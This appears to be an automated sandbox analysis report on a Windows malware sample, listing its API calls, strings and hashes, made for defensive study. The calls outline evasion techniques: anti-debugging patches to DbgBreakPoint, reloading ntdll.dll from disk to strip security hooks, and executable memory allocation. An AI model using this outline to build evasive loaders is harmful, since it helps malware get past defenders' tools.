Concurrency::cancel_current_task 26 API calls 18612->18616 18614 41074a 26 API calls 18613->18614 18617 40f95c 18614->18617 18615->18619 18616->18617 18618 4156af 25 API calls 18617->18618 18617->18619 18620 40f9ae 18618->18620 18619->18544 18684 40f450 18621->18684 18623 403dbc 18624 403e11 18623->18624 18703 40f5f0 18623->18703 18698 40f750 18624->18698 18627 403f66 18629 4156af 25 API calls 18627->18629 18632 403f8c 18627->18632 18628 403e1d ___scrt_fastfail 18628->18627 18631 40fc60 26 API calls 18628->18631 18630 403fa4 18629->18630 18631->18627 18632->18546 18634 40fe0d 18633->18634 18635 40fdc3 18633->18635 18637 40fe1c 18634->18637 18725 410100 18634->18725 18635->18634 18636 40fdcc 18635->18636 18720 4103b0 18636->18720 18637->18549 18640 40fdd5 18640->18549 18755 412d7d 18641->18755 18644 412ec2 18645 412ece ___scrt_is_nonwritable_in_current_image 18644->18645 18646 412ed8 18645->18646 18647 412eed 18645->18647 18648 413c57 _free 14 API calls 18646->18648 18653 412ee8 18647->18653 18811 416af7 EnterCriticalSection 18647->18811 18649 412edd 18648->18649 18651 41569f __cftof 25 API calls 18649->18651 18651->18653 18652 412f0a 18812 412e4b 18652->18812 18653->18567 18655 412f15 18828 412f3c 18655->18828 19245 4153d5 18657->19245 18661 413ba6 18660->18661 18662 413b89 18660->18662 18661->18601 18662->18661 18663 413b96 18662->18663 18664 413baa 18662->18664 18665 413c57 _free 14 API calls 18663->18665 19388 41395c 18664->19388 18667 413b9b 18665->18667 18669 41569f __cftof 25 API calls 18667->18669 18669->18661 18671 412d71 18670->18671 18672 412d5d 18670->18672 18671->18601 18673 413c57 _free 14 API calls 18672->18673 18674 412d62 18673->18674 18675 41569f __cftof 25 API calls 18674->18675 18676 412d6d 18675->18676 18676->18601 18678 412d31 18677->18678 18679 412d45 18677->18679 18680 413c57 _free 14 API calls 18678->18680 18679->18601 18681 412d36 18680->18681 18682 41569f __cftof 25 API calls 18681->18682 18683 412d41 18682->18683 18683->18601 18685 40f46b 
18684->18685 18697 40f545 __fread_nolock 18684->18697 18686 40f5d2 18685->18686 18689 40f4f2 18685->18689 18690 40f4c8 18685->18690 18696 40f4d9 __fread_nolock 18685->18696 18685->18697 18687 4103a0 26 API calls 18686->18687 18688 40f5d7 18687->18688 18691 401e10 Concurrency::cancel_current_task 26 API calls 18688->18691 18694 41074a 26 API calls 18689->18694 18689->18696 18690->18688 18693 41074a 26 API calls 18690->18693 18692 40f5dc 18691->18692 18693->18696 18694->18696 18695 4156af 25 API calls 18695->18686 18696->18695 18696->18697 18697->18623 18699 40f781 18698->18699 18700 40f75e 18698->18700 18699->18628 18700->18699 18701 4156af 25 API calls 18700->18701 18702 40f7cc 18701->18702 18704 40f62a 18703->18704 18705 40f60a 18703->18705 18706 40f736 18704->18706 18707 40f63c 18704->18707 18705->18623 18708 4103a0 26 API calls 18706->18708 18711 40f699 18707->18711 18712 40f66f 18707->18712 18709 40f73b 18708->18709 18710 401e10 Concurrency::cancel_current_task 26 API calls 18709->18710 18718 40f680 __fread_nolock 18710->18718 18714 41074a 26 API calls 18711->18714 18711->18718 18712->18709 18713 40f67a 18712->18713 18716 41074a 26 API calls 18713->18716 18714->18718 18715 4156af 25 API calls 18717 40f745 18715->18717 18716->18718 18718->18715 18719 40f6fd __fread_nolock 18718->18719 18719->18623 18721 4103c4 18720->18721 18724 4103d5 __fread_nolock 18721->18724 18740 410470 18721->18740 18723 41045b 18723->18640 18724->18640 18726 410125 18725->18726 18727 41023c 18725->18727 18731 410160 18726->18731 18732 41018a 18726->18732 18728 4103a0 26 API calls 18727->18728 18729 410241 18728->18729 18730 401e10 Concurrency::cancel_current_task 26 API calls 18729->18730 18738 410171 __fread_nolock 18730->18738 18731->18729 18733 41016b 18731->18733 18734 41074a 26 API calls 18732->18734 18732->18738 18736 41074a 26 API calls 18733->18736 18734->18738 18735 4156af 25 API calls 18737 41024b 18735->18737 18736->18738 18738->18735 18739 4101fa __fread_nolock 18738->18739 
18739->18637 18741 410495 18740->18741 18742 410597 18740->18742 18746 4104d0 18741->18746 18747 4104f7 18741->18747 18743 4103a0 26 API calls 18742->18743 18744 41059c 18743->18744 18745 401e10 Concurrency::cancel_current_task 26 API calls 18744->18745 18753 4104e1 __fread_nolock 18745->18753 18746->18744 18748 4104db 18746->18748 18749 41074a 26 API calls 18747->18749 18747->18753 18751 41074a 26 API calls 18748->18751 18749->18753 18750 4156af 25 API calls 18752 4105a6 18750->18752 18751->18753 18753->18750 18754 41055f __fread_nolock 18753->18754 18754->18723 18758 412d89 ___scrt_is_nonwritable_in_current_image 18755->18758 18756 412d90 18757 413c57 _free 14 API calls 18756->18757 18759 412d95 18757->18759 18758->18756 18760 412db0 18758->18760 18761 41569f __cftof 25 API calls 18759->18761 18762 412dc2 18760->18762 18763 412db5 18760->18763 18764 406376 18761->18764 18772 416b1f 18762->18772 18765 413c57 _free 14 API calls 18763->18765 18764->18570 18764->18644 18765->18764 18768 412dd2 18770 413c57 _free 14 API calls 18768->18770 18769 412ddf 18780 412e1d 18769->18780 18770->18764 18773 416b2b ___scrt_is_nonwritable_in_current_image 18772->18773 18784 416943 EnterCriticalSection 18773->18784 18775 416b39 18785 416bc3 18775->18785 18781 412e21 18780->18781 18810 416b0b LeaveCriticalSection 18781->18810 18783 412e32 18783->18764 18784->18775 18793 416be6 18785->18793 18786 416c3e 18787 41b7df _free 14 API calls 18786->18787 18788 416c47 18787->18788 18790 417051 _free 14 API calls 18788->18790 18791 416c50 18790->18791 18797 416b46 18791->18797 18803 417f01 18791->18803 18793->18786 18793->18797 18801 416af7 EnterCriticalSection 18793->18801 18802 416b0b LeaveCriticalSection 18793->18802 18798 416b7f 18797->18798 18809 41698b LeaveCriticalSection 18798->18809 18800 412dcb 18800->18768 18800->18769 18801->18793 18802->18793 18804 417cc3 _free 5 API calls 18803->18804 18805 417f1d 18804->18805 18806 417f3b InitializeCriticalSectionAndSpinCount 18805->18806 18807 
416c6f 18805->18807 18806->18807 18808 416af7 EnterCriticalSection 18807->18808 18808->18797 18809->18800 18810->18783 18811->18652 18813 412e58 18812->18813 18814 412e6d 18812->18814 18815 413c57 _free 14 API calls 18813->18815 18819 412e68 18814->18819 18831 417484 18814->18831 18817 412e5d 18815->18817 18818 41569f __cftof 25 API calls 18817->18818 18818->18819 18819->18655 18824 412e90 18848 417117 18824->18848 18827 417051 _free 14 API calls 18827->18819 19244 416b0b LeaveCriticalSection 18828->19244 18830 412f44 18830->18653 18832 412e82 18831->18832 18833 41749c 18831->18833 18837 417267 18832->18837 18833->18832 18834 417240 __fread_nolock 25 API calls 18833->18834 18835 4174ba 18834->18835 18863 419620 18835->18863 18838 412e8a 18837->18838 18839 41727e 18837->18839 18841 417240 18838->18841 18839->18838 18840 417051 _free 14 API calls 18839->18840 18840->18838 18842 417261 18841->18842 18843 41724c 18841->18843 18842->18824 18844 413c57 _free 14 API calls 18843->18844 18845 417251 18844->18845 18846 41569f __cftof 25 API calls 18845->18846 18847 41725c 18846->18847 18847->18824 18849 417128 18848->18849 18853 41713d 18848->18853 18850 413c44 __dosmaperr 14 API calls 18849->18850 18852 41712d 18850->18852 18851 417186 18854 413c44 __dosmaperr 14 API calls 18851->18854 18855 413c57 _free 14 API calls 18852->18855 18853->18851 18856 417164 18853->18856 18857 41718b 18854->18857 18861 412e96 18855->18861 19204 41708b 18856->19204 18858 413c57 _free 14 API calls 18857->18858 18860 417193 18858->18860 18862 41569f __cftof 25 API calls 18860->18862 18861->18819 18861->18827 18862->18861 18864 41962c ___scrt_is_nonwritable_in_current_image 18863->18864 18865 419634 18864->18865 18867 41964c 18864->18867 18933 413c44 18865->18933 18868 4196e7 18867->18868 18872 41967e 18867->18872 18870 413c44 __dosmaperr 14 API calls 18868->18870 18873 4196ec 18870->18873 18871 413c57 _free 14 API calls 18887 419641 18871->18887 18888 418732 EnterCriticalSection 18872->18888 
18875 413c57 _free 14 API calls 18873->18875 18877 4196f4 18875->18877 18876 419684 18878 4196a0 18876->18878 18879 4196b5 18876->18879 18880 41569f __cftof 25 API calls 18877->18880 18882 413c57 _free 14 API calls 18878->18882 18889 419712 18879->18889 18880->18887 18884 4196a5 18882->18884 18883 4196b0 18936 4196df 18883->18936 18885 413c44 __dosmaperr 14 API calls 18884->18885 18885->18883 18887->18832 18888->18876 18890 419734 18889->18890 18928 419750 18889->18928 18891 419738 18890->18891 18893 419788 18890->18893 18892 413c44 __dosmaperr 14 API calls 18891->18892 18894 41973d 18892->18894 18896 41979b 18893->18896 18946 41f87f 18893->18946 18895 413c57 _free 14 API calls 18894->18895 18897 419745 18895->18897 18939 4192b9 18896->18939 18900 41569f __cftof 25 API calls 18897->18900 18900->18928 18902 4197b1 18906 4197b5 18902->18906 18907 4197da 18902->18907 18903 4197f0 18904 419804 18903->18904 18905 419849 WriteFile 18903->18905 18910 419839 18904->18910 18911 41980f 18904->18911 18908 41986d GetLastError 18905->18908 18914 4197d0 18905->18914 18906->18914 18949 419251 18906->18949 18954 418ea7 GetConsoleCP 18907->18954 18908->18914 18982 41932a 18910->18982 18915 419814 18911->18915 18916 419829 18911->18916 18920 419893 18914->18920 18921 4198bd 18914->18921 18914->18928 18915->18914 18918 419819 18915->18918 18974 4194ee 18916->18974 18917 419827 18917->18914 18967 419405 18918->18967 18923 4198b1 18920->18923 18924 41989a 18920->18924 18926 413c57 _free 14 API calls 18921->18926 18921->18928 18989 413c21 18923->18989 18927 413c57 _free 14 API calls 18924->18927 18929 4198d5 18926->18929 18930 41989f 18927->18930 18928->18883 18931 413c44 __dosmaperr 14 API calls 18929->18931 18932 413c44 __dosmaperr 14 API calls 18930->18932 18931->18928 18932->18928 18934 417a99 _free 14 API calls 18933->18934 18935 413c49 18934->18935 18935->18871 19203 4187e7 LeaveCriticalSection 18936->19203 18938 4196e5 18938->18887 18994 41f686 18939->18994 18941 4192ca 18945 

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00401F6A
                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00401F7F
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401F82
                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00401F90
                                                                                  • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00401FB3
                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00401FBE
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401FC1
                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00401FD1
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401FD4
                                                                                  • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00401FFE
                                                                                  • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00402011
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 004020A2
                                                                                  • HeapFree.KERNEL32(00000000), ref: 004020AB
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004020B0
                                                                                  • HeapFree.KERNEL32(00000000), ref: 004020B3
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004020BA
                                                                                  • HeapFree.KERNEL32(00000000), ref: 004020BD
                                                                                  • LocalFree.KERNEL32(00000000), ref: 004020C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                                  • String ID:
                                                                                  • API String ID: 3326663573-0
                                                                                  • Opcode ID: 2f31ebec3fe9f8993efa4e5ebf62337cafbb00ec17dfdc0651c846f209d830ad
                                                                                  • Instruction ID: 1fdb30066f43f3f59f6a83a22fe7b12dcdb6b628cd19f67903b76f141601f4a5
                                                                                  • Opcode Fuzzy Hash: 2f31ebec3fe9f8993efa4e5ebf62337cafbb00ec17dfdc0651c846f209d830ad
                                                                                  • Instruction Fuzzy Hash: 1E516175E00219AFEB109FA5CD88FAFBB7CEF44344F05416AE905E3281DA749E05CBA4

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQueryInformationProcess,?,?,?,?,7FE42071), ref: 7FE42251
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 7FE4225A
                                                                                  • GetCurrentProcess.KERNEL32(00000022,00000000,00000004,?,?,?,?,7FE42071), ref: 7FE4226F
                                                                                  • NtQueryInformationProcess.NTDLL(00000000,?,?,?,7FE42071), ref: 7FE42276
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwQueryInformationProcess,?,?,?,7FE42071), ref: 7FE42291
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 7FE42294
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProcess$CurrentInformationQuery
                                                                                  • String ID: ZwQueryInformationProcess$ntdll$ntdll.dll
                                                                                  • API String ID: 460765316-442758927
                                                                                  • Opcode ID: b828806d0fd79351611bb38ed87b16235be445b549a03474a29fa1beab70e088
                                                                                  • Instruction ID: c43e8887edb143a630375315b9d9582e51a2876b0aac7502fde47bf8d8371ccf
                                                                                  • Opcode Fuzzy Hash: b828806d0fd79351611bb38ed87b16235be445b549a03474a29fa1beab70e088
                                                                                  • Instruction Fuzzy Hash: 7B01D67BE0030CBBEB0097E5AC49FBE7BBCEB88265F24011AF901E3040D674DA158B64
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?,00412C10,?,?,?,?,?,00413CC2), ref: 00412C33
                                                                                  • TerminateProcess.KERNEL32(00000000,?,00412C10,?,?,?,?,?,00413CC2), ref: 00412C3A
                                                                                  • ExitProcess.KERNEL32 ref: 00412C4C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: e04fff1fcd62ed4c0ec845f691e2175282aea113ede7df89dcb23ddb00460aeb
                                                                                  • Instruction ID: de05ac795346e79980b6987cd1a2e8e64cd183bf83a2b0c727bf905c418a36bc
                                                                                  • Opcode Fuzzy Hash: e04fff1fcd62ed4c0ec845f691e2175282aea113ede7df89dcb23ddb00460aeb
                                                                                  • Instruction Fuzzy Hash: 8AE04F31101544AFCF252B15CE09A9E3B68FF00341B444029F904C6131DB79DDA3CA88

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,7FE4208A), ref: 7FE42DFB
                                                                                    • Part of subcall function 7FE432D4: GetProcessHeap.KERNEL32(00000000,7FE453D0,00000000,7FE42E0C,7FE453D0), ref: 7FE43310
                                                                                    • Part of subcall function 7FE432D4: RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 7FE4331F
                                                                                    • Part of subcall function 7FE432D4: memcpy.NTDLL(00000000,02263E58,?), ref: 7FE4333F
                                                                                    • Part of subcall function 7FE432D4: memcpy.NTDLL(?,02263E58,00000000), ref: 7FE4336A
                                                                                    • Part of subcall function 7FE432D4: IsBadReadPtr.KERNEL32(?,?), ref: 7FE43391
                                                                                    • Part of subcall function 7FE432D4: HeapFree.KERNEL32(?,00000000,?), ref: 7FE433AA
                                                                                  • HeapDestroy.KERNEL32(?), ref: 7FE42E1A
                                                                                  • IsBadReadPtr.KERNEL32(00000000,?), ref: 7FE42E5F
                                                                                  • VirtualProtect.KERNELBASE(00000000,?,00000004,00000000), ref: 7FE42E88
                                                                                  • memcpy.NTDLL(00000000,?,?), ref: 7FE42E94
                                                                                  • VirtualProtect.KERNELBASE(00000000,?,00000000,00000000), ref: 7FE42EA7
                                                                                  • VirtualProtect.KERNELBASE(?,0000010A,00000004,00000000), ref: 7FE42ED7
                                                                                  • memset.NTDLL ref: 7FE42EE7
                                                                                  • memcpy.NTDLL(?,?,00000000), ref: 7FE42F07
                                                                                  • GetTickCount.KERNEL32 ref: 7FE42F7D
                                                                                  • VirtualProtect.KERNELBASE(?,?,00000020,00000000), ref: 7FE4303F
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 7FE43094
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 7FE430A9
                                                                                  • RtlCaptureContext.NTDLL(0000040C), ref: 7FE430C2
                                                                                  • memcpy.NTDLL(00000000,7FE452E4,00000011), ref: 7FE430D0
                                                                                  • memcpy.NTDLL(00000011,7FE433D2,000003EF,00000000,7FE452E4,00000011), ref: 7FE430E3
                                                                                  • GetProcessHeap.KERNEL32 ref: 7FE43103
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,ZwContinue), ref: 7FE4312D
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 7FE4313A
                                                                                  • GetProcAddress.KERNEL32(00000000,VirtualFree), ref: 7FE43146
                                                                                  • GetProcAddress.KERNEL32(00000000,HeapDestroy), ref: 7FE43153
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000040,00000000,7FE4208A), ref: 7FE431AF
                                                                                  • memcpy.NTDLL(00000000,7FE453D8,?), ref: 7FE431C5
                                                                                  • memcpy.NTDLL(?,?,?), ref: 7FE431F4
                                                                                  • GetTickCount.KERNEL32 ref: 7FE4326F
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 7FE432C9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$Virtual$Heap$Protect$AddressHandleModuleProc$AllocCountFreeProcessReadTick$AllocateCaptureContextDestroymemset
                                                                                  • String ID: $HeapDestroy$VirtualFree$ZwContinue$kernel32.dll$ntdll.dll
                                                                                  • API String ID: 1144457544-3596324431
                                                                                  • Opcode ID: 4b231ea1ca43c35110b809eeefee1f5c8187e956e1b50f4f7dd18bab82f44ae4
                                                                                  • Instruction ID: 732545531038e7714358bfe6ab87001606b6185c74c7238915c452f030bfd5c1
                                                                                  • Opcode Fuzzy Hash: 4b231ea1ca43c35110b809eeefee1f5c8187e956e1b50f4f7dd18bab82f44ae4
                                                                                  • Instruction Fuzzy Hash: 62F1CC76A00305AFDB21CFA5DC84BAAB7BAFF44348F10552DF906AB241D734E994EB50
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 7FE319B9
                                                                                    • Part of subcall function 7FE31BC0: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,7FE319C5,00000000), ref: 7FE31BD6
                                                                                    • Part of subcall function 7FE31BC0: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 7FE31BE2
                                                                                    • Part of subcall function 7FE31C06: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                    • Part of subcall function 7FE31C06: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                    • Part of subcall function 7FE31C06: GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                    • Part of subcall function 7FE31C06: malloc.MSVCRT ref: 7FE31C67
                                                                                    • Part of subcall function 7FE31C06: ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                    • Part of subcall function 7FE31C06: VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                    • Part of subcall function 7FE31C06: free.MSVCRT ref: 7FE31D06
                                                                                    • Part of subcall function 7FE31C06: CloseHandle.KERNELBASE(7FE319D1), ref: 7FE31D10
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 7FE319E5
                                                                                  • memcpy.MSVCRT(Function_00000000,00000000,?), ref: 7FE31A93
                                                                                  • GetCurrentProcess.KERNEL32 ref: 7FE31AC5
                                                                                  • IsBadReadPtr.KERNEL32(?,?), ref: 7FE31B09
                                                                                  • IsBadReadPtr.KERNEL32(00000000,?), ref: 7FE31B17
                                                                                  • memcmp.MSVCRT(?,00000000,?), ref: 7FE31B26
                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,00001000,00000040,?), ref: 7FE31B5B
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 7FE31B98
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704847684.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_7fe31000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$FileHandleRead$CurrentModuleProcessVirtual$AddressAllocCloseCreateEnvironmentExpandFreeProcSizeStringsfreemallocmemcmp
                                                                                  • String ID: %Systemroot%\system32\combase.dll$%Systemroot%\system32\ntdll.dll$ZwProtectVirtualMemory$combase.dll$ntdll.dll
                                                                                  • API String ID: 288383237-3427567192
                                                                                  • Opcode ID: f1a208d53d8805e2378b0198be8e792b5a9b92c2038927b6b191f4b3b12e1ae7
                                                                                  • Instruction ID: e13732920362c93adadf7f955773acdb4f5f8b940de6f6bd2b25e23fa99a90bd
                                                                                  • Opcode Fuzzy Hash: f1a208d53d8805e2378b0198be8e792b5a9b92c2038927b6b191f4b3b12e1ae7
                                                                                  • Instruction Fuzzy Hash: 4851B375D00319EFDF118FA5C888EEEB7BAEF84335F90415EE802A6140E7396A44CB61
                                                                                  APIs
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                  • malloc.MSVCRT ref: 7FE31C67
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                  • memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                  • memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                  • free.MSVCRT ref: 7FE31D06
                                                                                  • CloseHandle.KERNELBASE(7FE319D1), ref: 7FE31D10
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704847684.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_7fe31000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$memcpy$AllocCloseCreateEnvironmentExpandHandleReadSizeStringsVirtualfreemalloc
                                                                                  • String ID: MZ
                                                                                  • API String ID: 674188835-2410715997
                                                                                  • Opcode ID: 226944550cf8b9c8bf3112644910aa94d62cb1f495bc6e49e34df98963ec1635
                                                                                  • Instruction ID: 37ed921750a05b1c156510011ba82f53be2a36d11858f4e25eb232333dd4bf60
                                                                                  • Opcode Fuzzy Hash: 226944550cf8b9c8bf3112644910aa94d62cb1f495bc6e49e34df98963ec1635
                                                                                  • Instruction Fuzzy Hash: 7C31C3BAD00208EFCB208F95CC8CEDEBBBDEF45726F604459F94696140D774AA94DB60

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3907804496
                                                                                  • Opcode ID: c5fc1acd454c809a3f827d147cfc9e5bbe1309f9dea165f61a64e230980958e6
                                                                                  • Instruction ID: ccbdb6b73398ac1f50e4eba1b780227a473e8b811b79760b547c434c52d04649
                                                                                  • Opcode Fuzzy Hash: c5fc1acd454c809a3f827d147cfc9e5bbe1309f9dea165f61a64e230980958e6
                                                                                  • Instruction Fuzzy Hash: E4C10770E04249AFDB11DF59D880BEEBBB1FF49304F10415AE914A7392C77899C2CBA9

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,7FE4208A,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?,?,?,00000000,?), ref: 7FE416E0
                                                                                  • GetProcAddress.KERNEL32(00000000,DbgBreakPoint), ref: 7FE416F9
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,7FE4208A,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?), ref: 7FE41711
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,?,7FE4208A,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?), ref: 7FE41722
                                                                                  • GetProcAddress.KERNEL32(00000000,DbgUserBreakPoint), ref: 7FE4172A
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?,?,?,00000000), ref: 7FE4173D
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,7FE4208A,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?,?,?,00000000), ref: 7FE4174E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual$AddressProc$HandleModule
                                                                                  • String ID: DbgBreakPoint$DbgUserBreakPoint$ntdll.dll
                                                                                  • API String ID: 2768151571-2163194510
                                                                                  • Opcode ID: dc61deef4fa4a8389b5bc066f4f6e32763e1d74a14b8d98a62bb532b6e57c122
                                                                                  • Instruction ID: 3f854206d3d5076221b1d09f819529f2bcf6369cecf85685e806e0c7a52382f1
                                                                                  • Opcode Fuzzy Hash: dc61deef4fa4a8389b5bc066f4f6e32763e1d74a14b8d98a62bb532b6e57c122
                                                                                  • Instruction Fuzzy Hash: FE01D8772083057FD2119655AC40F7B7BBCDBC6574F10021EFF55A21819B74E415467A

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0041E300: CreateFileW.KERNELBASE(00000000,00000000,?,0041E6F0,?,?,00000000,?,0041E6F0,00000000,0000000C), ref: 0041E31D
                                                                                  • GetLastError.KERNEL32 ref: 0041E75B
                                                                                  • __dosmaperr.LIBCMT ref: 0041E762
                                                                                  • GetFileType.KERNELBASE(00000000), ref: 0041E76E
                                                                                  • GetLastError.KERNEL32 ref: 0041E778
                                                                                  • __dosmaperr.LIBCMT ref: 0041E781
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041E7A1
                                                                                  • CloseHandle.KERNEL32(?), ref: 0041E8EE
                                                                                  • GetLastError.KERNEL32 ref: 0041E920
                                                                                  • __dosmaperr.LIBCMT ref: 0041E927
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
